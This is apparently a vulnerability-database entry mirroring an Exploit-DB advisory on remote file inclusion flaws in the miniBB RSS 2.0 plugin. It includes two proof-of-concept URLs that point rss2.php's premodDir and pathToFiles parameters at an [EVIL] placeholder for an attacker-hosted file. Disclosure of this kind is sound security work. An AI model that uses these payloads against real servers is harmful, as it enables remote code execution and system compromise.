MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusions

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056764 漏洞类型
发布时间 2008-07-29 更新时间 2008-07-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32123
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/30421/info

The RSS plugin for miniBB is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying computer; other attacks are also possible. 

http://www.example.com/rss2.php?premodDir=[EVIL]
http://www.example.com/rss2.php?pathToFiles=[EVIL]